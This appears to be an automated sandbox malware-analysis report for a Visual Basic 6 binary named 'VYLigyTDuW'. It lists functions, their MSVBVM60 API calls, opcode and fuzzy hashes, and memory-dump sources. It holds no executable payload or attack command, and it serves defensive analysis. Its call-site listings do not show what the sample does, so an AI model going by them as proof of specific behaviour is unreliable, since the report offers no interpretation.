Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Move$ErrorSystem$#644ChkstkFree$ListLockRedimUnlock
String ID:
API String ID: 740360539-0
Opcode ID: 728114641df7a79aac841adb6583233822abd9a879369509690eae40c3288537
Instruction ID: 7a752b8ccec2d36940732cf74105f7a2d05fb18cf9d3a0d11c1ef7fd71a57e80
Opcode Fuzzy Hash: 728114641df7a79aac841adb6583233822abd9a879369509690eae40c3288537
Instruction Fuzzy Hash: 9B310EB1A40209ABCB01EBE5CC46EEE77BCAF44708F10453BF501B71E1DE7999058769

Function 005C5D8C Relevance: 25.6, APIs: 17, Instructions: 108COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C5DA8
#648.MSVBVM60(0000000A), ref: 005C5DDE
__vbaFreeVar.MSVBVM60(0000000A), ref: 005C5DF0
__vbaVarVargNofree.MSVBVM60(?,?,?,0000000A), ref: 005C5E09
__vbaVarTstEq.MSVBVM60(00008008,00000000,?,?,?,0000000A), ref: 005C5E13
#645.MSVBVM60(?,00000000,00008008,00000000,?,?,?,0000000A), ref: 005C5E2E
__vbaStrMove.MSVBVM60(?,00000000,00008008,00000000,?,?,?,0000000A), ref: 005C5E38
__vbaStrCmp.MSVBVM60(0040AC10,00000000,?,00000000,00008008,00000000,?,?,?,0000000A), ref: 005C5E43
__vbaFreeStr.MSVBVM60(0040AC10,00000000,?,00000000,00008008,00000000,?,?,?,0000000A), ref: 005C5E56

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Free$#645#648ChkstkMoveNofreeVarg
String ID:
API String ID: 3980291390-0
Opcode ID: c5c3566d4b7974a554dd0a241a8fc225d87a32eebf33b056c6fde544e92cb717
Instruction ID: 11baeeb10c0f6c1011a1fd744a15cf69d863ea98a056baf5c62e3208a1aa3604
Opcode Fuzzy Hash: c5c3566d4b7974a554dd0a241a8fc225d87a32eebf33b056c6fde544e92cb717
Instruction Fuzzy Hash: BB413475900609EFCB00EFA5C885EAE7BB8FF04704F108569F915AB2E1DB78E985CB54

Function 005C5560 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C557C
__vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,?,?,?,00401526), ref: 005C55BD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C5601
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,00000058), ref: 005C563C
__vbaObjSet.MSVBVM60(?,00000000), ref: 005C565D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BED4,000000E0), ref: 005C5692
__vbaStrI2.MSVBVM60(?), ref: 005C56A3
__vbaStrMove.MSVBVM60(?), ref: 005C56AD
#690.MSVBVM60(?,Options,Show Tips at Startup,00000000,?), ref: 005C56C0
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,Options,Show Tips at Startup,00000000,?), ref: 005C56CF
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00401526), ref: 005C56E1

Strings

Options, xrefs: 005C56B8
Show Tips at Startup, xrefs: 005C56B3

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$CheckHresult$FreeList$#690ChkstkMoveNew2
String ID: Options$Show Tips at Startup
API String ID: 557462102-2759323971
Opcode ID: be44a6ea1aab923b223c11acc9a7f3ad81ddb6eb90b6aaffbd788842099228da
Instruction ID: da9f9441e7b7ee10e8fc2eca13fd522e4376d56dc14b15ccd0d30e7587934896
Opcode Fuzzy Hash: be44a6ea1aab923b223c11acc9a7f3ad81ddb6eb90b6aaffbd788842099228da
Instruction Fuzzy Hash: 3651A171D00608AFCB01DFD4D849FDEBBB9FB08344F50442AF505BB2A1D779A9949B98

Function 0054EEC1 Relevance: 21.1, APIs: 14, Instructions: 137COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054EEDD
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401526), ref: 0054EEF6
__vbaVarMove.MSVBVM60 ref: 0054EF15
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054EF47
__vbaVarCmpGt.MSVBVM60(?,005C92C0,00008003,0000000B), ref: 0054EF93
__vbaVarOr.MSVBVM60(?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EF9D
__vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFA3
__vbaFreeVar.MSVBVM60(00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFAF
__vbaRedim.MSVBVM60(00000080,00000001,005C9220,00000011,00000001,-00000001,00000000,00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFD8
__vbaAryLock.MSVBVM60(?), ref: 0054EFEA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054F02A
__vbaAryUnlock.MSVBVM60(?), ref: 0054F042
__vbaVarMove.MSVBVM60(?,00006011,?), ref: 0054F068
__vbaFreeObj.MSVBVM60(0054F0AB,?,00006011,?), ref: 0054F0A5

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$CheckFreeHresultMove$AddrefBoolChkstkLockNullRedimUnlock
String ID:
API String ID: 4045727025-0
Opcode ID: 29b91bc42912a3bc9b310bbd0cdda3b676bd3b1d8dc34fa730680110e473dc14
Instruction ID: 029f9c49dd1ee4880fa9ced8260b98b989ed3db2dae99dfc53156becf0ce91cb
Opcode Fuzzy Hash: 29b91bc42912a3bc9b310bbd0cdda3b676bd3b1d8dc34fa730680110e473dc14
Instruction Fuzzy Hash: B951C471900218AFDB10EFA4CC89FDDBBB9FB08318F14442AF105BB1A2D7799948DB64

Function 0054CEF9 Relevance: 19.6, APIs: 13, Instructions: 74COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054CF15
__vbaStrCopy.MSVBVM60(?,?,?,?,00401526), ref: 0054CF2D
#526.MSVBVM60(?,00000104,?,?,?,?,00401526), ref: 0054CF3B
__vbaStrVarMove.MSVBVM60(?,?,00000104,?,?,?,?,00401526), ref: 0054CF44
__vbaStrMove.MSVBVM60(?,?,00000104,?,?,?,?,00401526), ref: 0054CF4E
__vbaFreeVar.MSVBVM60(?,?,00000104,?,?,?,?,00401526), ref: 0054CF56

Part of subcall function 005C812E: __vbaChkstk.MSVBVM60(00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8149
Part of subcall function 005C812E: __vbaVarVargNofree.MSVBVM60(?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8161
Part of subcall function 005C812E: __vbaStrVarVal.MSVBVM60(00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C816B
Part of subcall function 005C812E: #644.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8171
Part of subcall function 005C812E: __vbaFreeStr.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C817C

__vbaSetSystemError.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFA0
#616.MSVBVM60(?,00000000,?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFB7
__vbaStrMove.MSVBVM60(?,00000000,?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFC1
__vbaStrCopy.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFD0
__vbaStrCopy.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054CFDB
__vbaFreeStr.MSVBVM60(0054D013,?,?,00000104,00004008,?,?,?,00004008), ref: 0054D005
__vbaFreeStr.MSVBVM60(0054D013,?,?,00000104,00004008,?,?,?,00004008), ref: 0054D00D

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Free$CopyMove$Chkstk$#526#616#644ErrorNofreeSystemVarg
String ID:
API String ID: 299759716-0
Opcode ID: a0f8164e3867a773ad2ea1d4f3e62d6fbe48e7a8157ab077b85badbe7fa4c803
Instruction ID: fca69512df412a8bd6ac5f0829a80bbfa00efb975074bbd1965f9d8ff9ab74f6
Opcode Fuzzy Hash: a0f8164e3867a773ad2ea1d4f3e62d6fbe48e7a8157ab077b85badbe7fa4c803
Instruction Fuzzy Hash: E031AB71D00209ABCF00EFE1C956EDEBBB5BF44308F54443AA501B71A5EB395A4ACB95

Function 0054C559 Relevance: 16.6, APIs: 11, Instructions: 80COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054C575
__vbaVarDup.MSVBVM60(?,00000003,?,?,00401526), ref: 0054C58D
#644.MSVBVM60(?,00000003,?,?,00401526), ref: 0054C598
__vbaI4Var.MSVBVM60(?,00000000,?,00000003,?,?,00401526), ref: 0054C5A2
#697.MSVBVM60(?,00000000,?,00000000,?,00000002,?), ref: 0054C5FE
__vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C619
__vbaVarMove.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C623
__vbaFreeVar.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C62B
__vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0054C64C
__vbaVarMove.MSVBVM60(?,00000002,?), ref: 0054C656
__vbaFreeVar.MSVBVM60(0054C695,00000000,?,00000000,?,00000002,?), ref: 0054C68F

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$FreeMove$#644#697Chkstk
String ID:
API String ID: 4043317205-0
Opcode ID: 11fcd46ebd7e5873753544fc1a3602888c33fd0c3b7a8c0cdb12f4b7f3a8cc6c
Instruction ID: dac2e6ef9e8b29cc94df0b649b97722a0f8c591a29ecb09df45362f36ba6f972
Opcode Fuzzy Hash: 11fcd46ebd7e5873753544fc1a3602888c33fd0c3b7a8c0cdb12f4b7f3a8cc6c
Instruction Fuzzy Hash: 3731FFB1901208AFCB40EF95DD85EDE7BBCFB54308F10456AF041AB1A1DB78AA09DB54

Function 0054ED02 Relevance: 15.1, APIs: 10, Instructions: 87COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,00401526), ref: 0054ED1E
__vbaObjSetAddref.MSVBVM60(?,00401360,?,?,?,00000000,00401526), ref: 0054ED37
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054ED69
#526.MSVBVM60(?,00007FFF), ref: 0054ED8F
__vbaStrVarMove.MSVBVM60(?,?,00007FFF), ref: 0054ED98
__vbaStrMove.MSVBVM60(?,?,00007FFF), ref: 0054EDA2
__vbaFreeVar.MSVBVM60(?,?,00007FFF), ref: 0054EDAA
#644.MSVBVM60(?,?,?,00007FFF), ref: 0054EDB2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054EDEA
__vbaFreeObj.MSVBVM60(0054EE23), ref: 0054EE1D

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$CheckFreeHresultMove$#526#644AddrefChkstk
String ID:
API String ID: 2274909516-0
Opcode ID: 7c45dc3ef16690f710e02e8a541f5ab013913157b6af3020d8fe52e566eb87ff
Instruction ID: 671d62be4eab6866a5eb24881cbda399b80a69873a8e6d53d4357914902f55c5
Opcode Fuzzy Hash: 7c45dc3ef16690f710e02e8a541f5ab013913157b6af3020d8fe52e566eb87ff
Instruction Fuzzy Hash: 2F31E071D00209AFDF01EBA5EC86FEEBBB8BF04308F10842AF111B61A1DB7955559F55

Function 0054C8B0 Relevance: 15.1, APIs: 10, Instructions: 82COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054C8CB
__vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526), ref: 0054C8EC
__vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 0054C8F6
#644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401526), ref: 0054C8FC
__vbaSetSystemError.MSVBVM60(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000,?,?,?,?,00401526), ref: 0054C921
__vbaFreeStr.MSVBVM60(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000,?,?,?,?,00401526), ref: 0054C92F
__vbaAryLock.MSVBVM60(?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 0054C95C
__vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000), ref: 0054C983
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,00000000,?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 0054C98C
__vbaSetSystemError.MSVBVM60(?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 0054C999

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$ErrorSystem$#644ChkstkFreeLockNofreeUnlockVarg
String ID:
API String ID: 2579818117-0
Opcode ID: 1f45dd0e7f012a2d6a78ca0c6e89c1bcb86a369ba553689d3a6593c186d6e592
Instruction ID: 896229b02a6ce180388516fc29f2a4a9bad2685a2558b090e87f12eab4806fbb
Opcode Fuzzy Hash: 1f45dd0e7f012a2d6a78ca0c6e89c1bcb86a369ba553689d3a6593c186d6e592
Instruction Fuzzy Hash: 2531F075900209BFDF00EB95CD56FAE7BB8FF04704F14442AF501BB1A1D679A940CB69

Function 0054F663 Relevance: 15.1, APIs: 10, Instructions: 71COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054F67F
__vbaVarDup.MSVBVM60(?,00000008,?,?,00401526), ref: 0054F697
#653.MSVBVM60(?,?,?,00000008,?,?,00401526), ref: 0054F6A4
__vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401526), ref: 0054F6AD
__vbaFreeVar.MSVBVM60 ref: 0054F6C6
#632.MSVBVM60(?,?,00000001,00000002), ref: 0054F6FB
__vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F70C
__vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F716
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054F725
__vbaFreeVar.MSVBVM60(0054F768), ref: 0054F762

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Free$#632#653ChkstkListMove
String ID:
API String ID: 2607714180-0
Opcode ID: 8b36459b788b84acfdcb111c424febc811a248507acd243f79d00c6536bf71ad
Instruction ID: a3a231060531e0de86830821634bafb016e253af35a50f4f255e236a5f0c7dd8
Opcode Fuzzy Hash: 8b36459b788b84acfdcb111c424febc811a248507acd243f79d00c6536bf71ad
Instruction Fuzzy Hash: 16219872C0014DABDB10EBD5C886EDEBBBCFF04308F54452AF501B7191E778A5898B95

Function 0054CD59 Relevance: 12.0, APIs: 8, Instructions: 48COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054CD74
__vbaStrCat.MSVBVM60(0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CD98
__vbaStrMove.MSVBVM60(0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDA2
__vbaStrCat.MSVBVM60(0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDAD
__vbaStrMove.MSVBVM60(0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDB7
__vbaI4Str.MSVBVM60(00000000,0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDBD
__vbaSetSystemError.MSVBVM60(000000FF,00000000,00000000,0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDCA
__vbaFreeStrList.MSVBVM60(00000002,?,?,000000FF,00000000,00000000,0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000), ref: 0054CDD9

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Move$ChkstkErrorFreeListSystem
String ID:
API String ID: 3065699893-0
Opcode ID: 10bf416ccd1d281886d5f9d9a4d97ed64426089d72a1d9df50e1dbd563c5f824
Instruction ID: 8077857ec8f06ac6f827f793ba9b34a51445d08b7ba732c6ab21e46ba098002d
Opcode Fuzzy Hash: 10bf416ccd1d281886d5f9d9a4d97ed64426089d72a1d9df50e1dbd563c5f824
Instruction Fuzzy Hash: C50144B1A402087BD700A7958C43FAF7B6CAB41B48F20453BB501B70D1DABC594546AE

Function 0054C9D2 Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054C9ED

Part of subcall function 0054CAB5: __vbaChkstk.MSVBVM60(?,0054C4AF,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000), ref: 0054CABB

#644.MSVBVM60(?,0056E371,?,?,?,?,00401526), ref: 0054CA10
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000005,00000000,?,00000000,?,0056E371,?,?,?,?,00401526), ref: 0054CA3B
__vbaAryLock.MSVBVM60(?,?), ref: 0054CA4C
#644.MSVBVM60(?,?,?), ref: 0054CA62
__vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054CA6E

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#644Chkstk$LockRedimUnlock
String ID:
API String ID: 2226984211-0
Opcode ID: 614c0eadf750dbd20b26a66969860a9958a329fb45584ee8b7d14761b268cce4
Instruction ID: e0f13fc114654bb1a15210baa5efcd9a0d7f71c9935d769580fc084064f631c0
Opcode Fuzzy Hash: 614c0eadf750dbd20b26a66969860a9958a329fb45584ee8b7d14761b268cce4
Instruction Fuzzy Hash: C121DE7194020DABDF00DFA5CD46FEE7BB8FB04748F144429F501FB291D679A9008B65

Function 0054B3EB Relevance: 9.1, APIs: 6, Instructions: 66COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054B406

Part of subcall function 0054B4D6: __vbaChkstk.MSVBVM60(00000016,00401526,?,?,?,0054B428,00000016,?,?,?,?,00401526), ref: 0054B4F1
Part of subcall function 0054B4D6: __vbaRedim.MSVBVM60(00000080,00000001,00000011,00000001,00004000,00000000,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B52A
Part of subcall function 0054B4D6: __vbaAryLock.MSVBVM60(00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B594
Part of subcall function 0054B4D6: #644.MSVBVM60(?,00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B5B0
Part of subcall function 0054B4D6: __vbaAryUnlock.MSVBVM60(00000016,?,00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B5BC

#644.MSVBVM60(?,?,?,?,00000016,?,?,?,?,00401526), ref: 0054B444
#644.MSVBVM60(?,00000016,?,?,?,?,?,00000016,?,?,?,?,00401526), ref: 0054B45E
#644.MSVBVM60(005497A7,00000016,?,?,00000016,?,?,?,?,?,00000016,?,?,?,?,00401526), ref: 0054B480
#644.MSVBVM60(?,?,?,005497A7,00000016,?,?,00000016,?,?,?,?,?,00000016), ref: 0054B497
#644.MSVBVM60(?,?,?,?,005497A7,00000016,?,?,00000016,?,?,?,?,?,00000016), ref: 0054B4A3

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: #644$__vba$Chkstk$LockRedimUnlock
String ID:
API String ID: 2110399347-0
Opcode ID: fe0142b8e8542b114497ebeb7ee0da0d88ee8ba0a563c4669415466abda16b50
Instruction ID: 2b64426ad1c69072ed6cd4913d655284d7325d5129e7b8df0e1bc3e14bb98972
Opcode Fuzzy Hash: fe0142b8e8542b114497ebeb7ee0da0d88ee8ba0a563c4669415466abda16b50
